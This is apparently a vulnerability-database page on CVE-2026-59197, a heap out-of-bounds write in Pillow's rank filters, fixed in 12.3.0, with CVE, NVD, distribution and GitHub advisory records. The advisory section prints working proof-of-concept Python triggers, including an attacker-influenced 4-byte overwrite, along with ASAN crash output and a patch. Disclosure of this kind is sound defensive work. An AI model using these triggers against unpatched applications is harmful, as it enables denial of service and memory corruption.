Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-59197 (GCVE-0-2026-59197)
Vulnerability from cvelistv5 – Published: 2026-07-14 16:25 – Updated: 2026-07-21 18:50| URL | Tags |
|---|---|
| https://github.com/python-pillow/Pillow/security/… | x_refsource_CONFIRM |
| https://github.com/python-pillow/Pillow/pull/9695 | x_refsource_MISC |
| https://github.com/python-pillow/Pillow/commit/cc… | x_refsource_MISC |
| https://github.com/python-pillow/Pillow/releases/… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| python-pillow | Pillow |
Affected:
< 12.3.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-59197",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-07-21T18:50:30.849980Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-07-21T18:50:40.019Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Pillow",
"vendor": "python-pillow",
"versions": [
{
"status": "affected",
"version": "\u003c 12.3.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Pillow is a Python imaging library. Prior to 12.3.0, Pillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190: Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-14T16:25:23.520Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
},
{
"name": "https://github.com/python-pillow/Pillow/pull/9695",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"name": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"name": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
}
],
"source": {
"advisory": "GHSA-xj96-63gp-2gmr",
"discovery": "UNKNOWN"
},
"title": "Pillow: Heap out-of-bounds write in Pillow `ImageFilter.RankFilter` via integer overflow in `ImagingExpand`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-59197",
"datePublished": "2026-07-14T16:25:23.520Z",
"dateReserved": "2026-07-02T19:53:48.831Z",
"dateUpdated": "2026-07-21T18:50:40.019Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-59197",
"date": "2026-08-04",
"epss": "0.00436",
"percentile": "0.35899"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-59197\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-07-14T17:17:14.487\",\"lastModified\":\"2026-07-21T19:17:11.907\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Pillow is a Python imaging library. Prior to 12.3.0, Pillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"python-pillow\",\"product\":\"Pillow\",\"versions\":[{\"version\":\"\u003c 12.3.0\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-07-21T18:50:30.849980Z\",\"id\":\"CVE-2026-59197\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-190\"},{\"lang\":\"en\",\"value\":\"CWE-787\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.3.0\",\"matchCriteriaId\":\"6372231F-529B-45CD-978E-3F2AEFF5F95C\"}]}]}],\"references\":[{\"url\":\"https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/python-pillow/Pillow/pull/9695\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/python-pillow/Pillow/releases/tag/12.3.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"redhat_vex": {
"aggregate_severity": "Important",
"current_release_date": "2026-08-04T21:42:54+00:00",
"cve": "CVE-2026-59197",
"id": "CVE-2026-59197",
"initial_release_date": "2026-07-14T16:25:23.520000+00:00",
"product_status:fixed": "106",
"product_status:known_affected": "67",
"product_status:known_not_affected": "653",
"source": "Red Hat CSAF VEX",
"status": "final",
"title": "Pillow: Pillow: Native heap out-of-bounds write",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-59197.json",
"version": "3"
},
"suse_vex": {
"aggregate_severity": "moderate",
"current_release_date": "2026-07-17T12:55:54Z",
"cve": "CVE-2026-59197",
"id": "CVE-2026-59197",
"initial_release_date": "2026-07-15T18:48:17Z",
"product_status:first_fixed": "32",
"product_status:known_affected": "49",
"product_status:recommended": "1",
"source": "SUSE CSAF VEX",
"status": "interim",
"title": "SUSE CVE CVE-2026-59197",
"url": "https://ftp.suse.com/pub/projects/security/csaf-vex/cve-2026-59197.json",
"version": "3"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-59197\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-07-21T18:50:30.849980Z\"}}}], \"references\": [{\"url\": \"https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-07-21T18:50:15.480Z\"}}], \"cna\": {\"title\": \"Pillow: Heap out-of-bounds write in Pillow `ImageFilter.RankFilter` via integer overflow in `ImagingExpand`\", \"source\": {\"advisory\": \"GHSA-xj96-63gp-2gmr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"python-pillow\", \"product\": \"Pillow\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 12.3.0\"}]}], \"references\": [{\"url\": \"https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr\", \"name\": \"https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/python-pillow/Pillow/pull/9695\", \"name\": \"https://github.com/python-pillow/Pillow/pull/9695\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1\", \"name\": \"https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/python-pillow/Pillow/releases/tag/12.3.0\", \"name\": \"https://github.com/python-pillow/Pillow/releases/tag/12.3.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Pillow is a Python imaging library. Prior to 12.3.0, Pillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-787\", \"description\": \"CWE-787: Out-of-bounds Write\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-190\", \"description\": \"CWE-190: Integer Overflow or Wraparound\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-07-14T16:25:23.520Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-59197\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-07-21T18:50:40.019Z\", \"dateReserved\": \"2026-07-02T19:53:48.831Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-07-14T16:25:23.520Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
alsa-2026:48021
Vulnerability from osv_almalinux
Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.
Security Fix(es):
- Pillow: Pillow: Native heap out-of-bounds write (CVE-2026-59197)
- Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image (CVE-2026-54058)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "python3-pillow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.1-23.el8_10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "python3-pillow-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.1-23.el8_10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "python3-pillow-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.1-23.el8_10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "python3-pillow-tk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.1-23.el8_10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. \n\nSecurity Fix(es): \n\n * Pillow: Pillow: Native heap out-of-bounds write (CVE-2026-59197)\n * Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image (CVE-2026-54058)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:48021",
"modified": "2026-07-31T12:25:39Z",
"published": "2026-07-29T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:48021"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2500043"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2500057"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/8/ALSA-2026-48021.html"
}
],
"related": [
"CVE-2026-59197",
"CVE-2026-54058"
],
"summary": "Important: python-pillow security update"
}
bit-pillow-2026-59197
Vulnerability from bitnami_vulndb
Pillow is a Python imaging library. Prior to 12.3.0, Pillow's public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "pillow",
"purl": "pkg:bitnami/pillow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "12.3.0"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2026-59197"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:python:pillow:*:*:*:*:*:python:*:*"
],
"severity": "High"
},
"details": "Pillow is a Python imaging library. Prior to 12.3.0, Pillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0.",
"id": "BIT-pillow-2026-59197",
"modified": "2026-07-20T00:08:36.695Z",
"published": "2026-07-19T23:50:18.914Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
}
],
"schema_version": "1.6.2",
"summary": "Pillow: Heap out-of-bounds write in Pillow `ImageFilter.RankFilter` via integer overflow in `ImagingExpand`"
}
FKIE_CVE-2026-59197
Vulnerability from fkie_nvd - Published: 2026-07-14 17:17 - Updated: 2026-07-21 19:17| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1 | Patch | |
| security-advisories@github.com | https://github.com/python-pillow/Pillow/pull/9695 | Issue Tracking, Patch | |
| security-advisories@github.com | https://github.com/python-pillow/Pillow/releases/tag/12.3.0 | Release Notes | |
| security-advisories@github.com | https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr | Exploit, Vendor Advisory |
{
"affected": [
{
"affectedData": [
{
"product": "Pillow",
"vendor": "python-pillow",
"versions": [
{
"status": "affected",
"version": "\u003c 12.3.0"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6372231F-529B-45CD-978E-3F2AEFF5F95C",
"versionEndExcluding": "12.3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Pillow is a Python imaging library. Prior to 12.3.0, Pillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0."
}
],
"id": "CVE-2026-59197",
"lastModified": "2026-07-21T19:17:11.907",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-59197",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-07-21T18:50:30.849980Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-07-14T17:17:14.487",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-190"
},
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-XJ96-63GP-2GMR
Vulnerability from github – Published: 2026-07-20 23:08 – Updated: 2026-07-20 23:08Summary
Pillow's public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size.
Minimal public API trigger:
from PIL import Image, ImageFilter
im = Image.new("L", (3, 3), 128)
im.filter(ImageFilter.MedianFilter(4294967295))
ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2)
before rank-filter size validation. With size = 4294967295, the
expansion margin is 2147483647 (INT_MAX). ImagingExpand() then computes
the output dimensions with unchecked signed int arithmetic. On tested builds,
this wraps to a tiny output image and the border-expansion loop writes past the
allocation.
This is reachable through documented public classes (RankFilter,
MedianFilter, MinFilter, and MaxFilter). No private API, ctypes, or custom
Python object is needed.
Details
Current src/PIL/ImageFilter.py:
class RankFilter(Filter):
def filter(self, image):
if image.mode == "P":
msg = "cannot filter palette images"
raise ValueError(msg)
image = image.expand(self.size // 2, self.size // 2)
return image.rankfilter(self.size, self.rank)
The expand() call is made before image.rankfilter(...).
Current src/libImaging/Filter.c:ImagingExpand() does not check output-size
overflow:
if (xmargin < 0 && ymargin < 0) {
return (Imaging)ImagingError_ValueError("bad kernel size");
}
imOut = ImagingNewDirty(
imIn->mode, imIn->xsize + 2 * xmargin, imIn->ysize + 2 * ymargin
);
For a 3x3 image and xmargin = ymargin = INT_MAX, the computed output size
wraps to 1x1 on tested builds. The following loop still uses the huge margin:
for (x = 0; x < xmargin; x++) {
imOut->image[yout][x] = imIn->image[yin][0];
}
src/libImaging/RankFilter.c does contain checks that would reject this size:
if (!(size & 1)) {
return (Imaging)ImagingError_ValueError("bad filter size");
}
if (size > INT_MAX / size || size > INT_MAX / (size * (int)sizeof(FLOAT32))) {
return (Imaging)ImagingError_ValueError("filter size too large");
}
But those checks are reached only after RankFilter.filter() has already
called image.expand(...).
Mode "L" produces 1-byte OOB stores. Modes "I" and "F" produce 4-byte OOB
stores. The repeated value written OOB is copied from the source image border
pixel, so attacker-supplied image bytes can influence it. This is a sequential
overwrite, not an arbitrary-address write.
PoC
Minimal ASAN crash PoC:
from PIL import Image, ImageFilter
im = Image.new("L", (3, 3), 128)
im.filter(ImageFilter.MedianFilter(4294967295))
Observed on local Pillow 12.3.0.dev0 ASAN target:
ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 1
ImagingExpand /out/src/src/libImaging/Filter.c:99
_expand_image /out/src/src/_imaging.c:1100
0 bytes after a 1-byte allocation
4-byte write variant with source pixel loaded from normal image bytes:
from io import BytesIO
from PIL import Image, ImageFilter
SIZE = 4294967295
PIXEL = 0x41424344
src = BytesIO()
Image.new("I", (3, 3), PIXEL).save(src, format="TIFF")
im = Image.open(BytesIO(src.getvalue()))
im.load()
assert im.mode == "I"
assert im.getpixel((0, 0)) == PIXEL
im.filter(ImageFilter.MedianFilter(SIZE))
Observed ASAN signature:
ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 4
ImagingExpand /out/src/src/libImaging/Filter.c:101
_expand_image /out/src/src/_imaging.c:1100
0 bytes after a 4-byte allocation
Version checks:
Pillow 1.0: ASAN heap-buffer-overflow WRITE confirmed at runtime
Pillow 12.3.0.dev0: ASAN heap-buffer-overflow WRITE confirmed at runtime
Pillow 1.0 through 12.2.0: source sweep confirmed the vulnerable public
validation order and unchecked ImagingExpand arithmetic
upstream/main at 9c1097c861420c77af53c7c9af2a1382e2bfaa8b: still affected
Impact
It is a heap out-of-bounds write in Pillow's native C extension, reachable through public image-filter classes.
Applications are impacted if an untrusted user can control the rank-filter
size/configuration passed to Pillow. If the image is also attacker-supplied, the
source pixel value written out of bounds can be attacker-influenced, including
4-byte values for mode "I" images.
Possible fix
Validate the rank-filter size before calling image.expand(...), and harden
ImagingExpand() against invalid margins and overflow:
if (xmargin < 0 || ymargin < 0) {
return (Imaging)ImagingError_ValueError("bad kernel size");
}
if (xmargin > (INT_MAX - imIn->xsize) / 2 ||
ymargin > (INT_MAX - imIn->ysize) / 2) {
return (Imaging)ImagingError_ValueError("bad kernel size");
}
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Pillow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "12.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-59197"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-20T23:08:58Z",
"nvd_published_at": "2026-07-14T17:17:14Z",
"severity": "HIGH"
},
"details": "### Summary\n\nPillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write\nwhen given a very large odd filter size.\n\nMinimal public API trigger:\n\n```python\nfrom PIL import Image, ImageFilter\n\nim = Image.new(\"L\", (3, 3), 128)\nim.filter(ImageFilter.MedianFilter(4294967295))\n```\n\n`ImageFilter.RankFilter.filter()` calls `image.expand(size // 2, size // 2)`\nbefore rank-filter size validation. With `size = 4294967295`, the\nexpansion margin is `2147483647` (`INT_MAX`). `ImagingExpand()` then computes\nthe output dimensions with unchecked signed `int` arithmetic. On tested builds,\nthis wraps to a tiny output image and the border-expansion loop writes past the\nallocation.\n\nThis is reachable through documented public classes (`RankFilter`,\n`MedianFilter`, `MinFilter`, and `MaxFilter`). No private API, ctypes, or custom\nPython object is needed.\n\n### Details\n\nCurrent `src/PIL/ImageFilter.py`:\n\n```python\nclass RankFilter(Filter):\n def filter(self, image):\n if image.mode == \"P\":\n msg = \"cannot filter palette images\"\n raise ValueError(msg)\n image = image.expand(self.size // 2, self.size // 2)\n return image.rankfilter(self.size, self.rank)\n```\n\nThe `expand()` call is made before `image.rankfilter(...)`.\n\nCurrent `src/libImaging/Filter.c:ImagingExpand()` does not check output-size\noverflow:\n\n```c\nif (xmargin \u003c 0 \u0026\u0026 ymargin \u003c 0) {\n return (Imaging)ImagingError_ValueError(\"bad kernel size\");\n}\n\nimOut = ImagingNewDirty(\n imIn-\u003emode, imIn-\u003exsize + 2 * xmargin, imIn-\u003eysize + 2 * ymargin\n);\n```\n\nFor a `3x3` image and `xmargin = ymargin = INT_MAX`, the computed output size\nwraps to `1x1` on tested builds. The following loop still uses the huge margin:\n\n```c\nfor (x = 0; x \u003c xmargin; x++) {\n imOut-\u003eimage[yout][x] = imIn-\u003eimage[yin][0];\n}\n```\n\n`src/libImaging/RankFilter.c` does contain checks that would reject this size:\n\n```c\nif (!(size \u0026 1)) {\n return (Imaging)ImagingError_ValueError(\"bad filter size\");\n}\nif (size \u003e INT_MAX / size || size \u003e INT_MAX / (size * (int)sizeof(FLOAT32))) {\n return (Imaging)ImagingError_ValueError(\"filter size too large\");\n}\n```\n\nBut those checks are reached only after `RankFilter.filter()` has already\ncalled `image.expand(...)`.\n\nMode `\"L\"` produces 1-byte OOB stores. Modes `\"I\"` and `\"F\"` produce 4-byte OOB\nstores. The repeated value written OOB is copied from the source image border\npixel, so attacker-supplied image bytes can influence it. This is a sequential\noverwrite, not an arbitrary-address write.\n\n### PoC\n\nMinimal ASAN crash PoC:\n\n```python\nfrom PIL import Image, ImageFilter\n\nim = Image.new(\"L\", (3, 3), 128)\nim.filter(ImageFilter.MedianFilter(4294967295))\n```\n\nObserved on local Pillow `12.3.0.dev0` ASAN target:\n\n```text\nERROR: AddressSanitizer: heap-buffer-overflow\nWRITE of size 1\nImagingExpand /out/src/src/libImaging/Filter.c:99\n_expand_image /out/src/src/_imaging.c:1100\n0 bytes after a 1-byte allocation\n```\n\n4-byte write variant with source pixel loaded from normal image bytes:\n\n```python\nfrom io import BytesIO\nfrom PIL import Image, ImageFilter\n\nSIZE = 4294967295\nPIXEL = 0x41424344\n\nsrc = BytesIO()\nImage.new(\"I\", (3, 3), PIXEL).save(src, format=\"TIFF\")\n\nim = Image.open(BytesIO(src.getvalue()))\nim.load()\nassert im.mode == \"I\"\nassert im.getpixel((0, 0)) == PIXEL\n\nim.filter(ImageFilter.MedianFilter(SIZE))\n```\n\nObserved ASAN signature:\n\n```text\nERROR: AddressSanitizer: heap-buffer-overflow\nWRITE of size 4\nImagingExpand /out/src/src/libImaging/Filter.c:101\n_expand_image /out/src/src/_imaging.c:1100\n0 bytes after a 4-byte allocation\n```\n\nVersion checks:\n\n```text\nPillow 1.0: ASAN heap-buffer-overflow WRITE confirmed at runtime\nPillow 12.3.0.dev0: ASAN heap-buffer-overflow WRITE confirmed at runtime\nPillow 1.0 through 12.2.0: source sweep confirmed the 